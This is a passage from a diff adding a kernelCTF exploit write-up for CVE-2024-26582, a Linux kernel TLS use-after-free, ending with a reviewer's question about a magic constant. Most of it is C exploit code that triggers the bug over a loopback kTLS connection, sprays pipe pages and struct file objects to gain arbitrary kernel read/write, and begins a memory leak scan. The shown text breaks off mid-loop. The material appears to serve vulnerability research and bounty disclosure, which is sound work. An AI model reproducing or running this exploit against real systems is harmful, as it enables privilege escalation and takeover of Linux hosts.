pocs/linux/kernelctf/CVE-2024-26582_mitigation/docs/exploit.md

```diff
@@ -0,0 +1,321 @@
+    socklen_t addr_len = sizeof(client_addr);
+
+    if ((server_fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
+        perror("socket");
+        exit(1);
+    }
+
+    memset(&server_addr, 0, sizeof(server_addr));
+    server_addr.sin_family = AF_INET;
+    server_addr.sin_addr.s_addr = INADDR_ANY;
+    server_addr.sin_port = htons(PORT);
+
+    if (bind(server_fd, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) {
+        perror("bind");
+        exit(1);
+    }
+
+    if (listen(server_fd, 5) < 0) {
+        perror("listen");
+        exit(1);
+    }
+
+
+    if ((client_fd = accept(server_fd, (struct sockaddr *)&client_addr, &addr_len)) < 0) {
+        perror("accept");
+        exit(1);
+    }
+
+    if (setup_ktls(client_fd, 0) < 0) {
+        close(client_fd);
+        close(server_fd);
+        exit(1);
+    }
+    char buf[0x20];
+    int bytes_received = recv(client_fd, buf, 0x20, 0);
+    puts("recv done");
+    if (bytes_received > 0) {
+    } else {
+        perror("recvmsg");
+    }
+    SYSCHK(read(pipe, buf, 1)); // hold
+    puts("close server");
+    close(client_fd);
+    close(server_fd);
+    exit(0);
+}
+
+void run_client() {
+    sleep(2);
+
+    int sockfd;
+    struct sockaddr_in server_addr;
+
+    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
+        perror("socket");
+        exit(1);
+    }
+
+    memset(&server_addr, 0, sizeof(server_addr));
+    server_addr.sin_family = AF_INET;
+    server_addr.sin_port = htons(PORT);
+    inet_pton(AF_INET, "127.0.0.1", &server_addr.sin_addr);
+
+    if (connect(sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) {
+        perror("connect");
+        close(sockfd);
+        exit(1);
+    }
+
+    if (setup_ktls(sockfd, 1) < 0) {
+        close(sockfd);
+        exit(1);
+    }
+
+    char buf[0x400];
+
+    if (send(sockfd, buf, sizeof(buf), 0) < 0) {
+        perror("sendmsg");
+    } else {
+    }
+
+}
+```
+
+Spray pages via the pipe to reclaim the UAF page:
+
+```c
+void spray_pipe() {
+    char buf[0x1000];
+    memset(buf, 'C', sizeof(buf));
+
+    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
+        write(pipe_fd[i][1], buf, sizeof(buf));
+        usleep(100);
+    }
+}
+pin_cpu(1);
+spray_pipe();
+```
+
+After freeing the page again, we spray struct file objects to overwrite it. This results in arbitrary read/write via the pipe, allowing us to tamper with file structures directly:
+
+```c
+SYSCHK(write(pipes[1], "A", 1)); // release socket
+usleep(50);
+int spray_fds[0x80];
+char buff[1024] = {};
+for (int i = 0; i < sizeof(spray_fds)/4; i++) {
+    spray_fds[i] = SYSCHK(open("/tmp/tmp_file", O_RDWR | O_CREAT, 0666));
+    SYSCHK(write(spray_fds[i], buff, i));
+}
+```
+
+Leak:
+
+```c
+u64 buf[0x1000/8];
+for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
+    SYSCHK(read(pipe_fd[i][0], buf, sizeof(buf)));
+    for (int j = 0; j < sizeof(buf)/8; j++)
+        if (buf[j] == 0x4f801f00000000) { // find flag file
```

Comment:
Can you add a source code or write-up comment what is 0x4f801f00000000 or which file struct field content is this?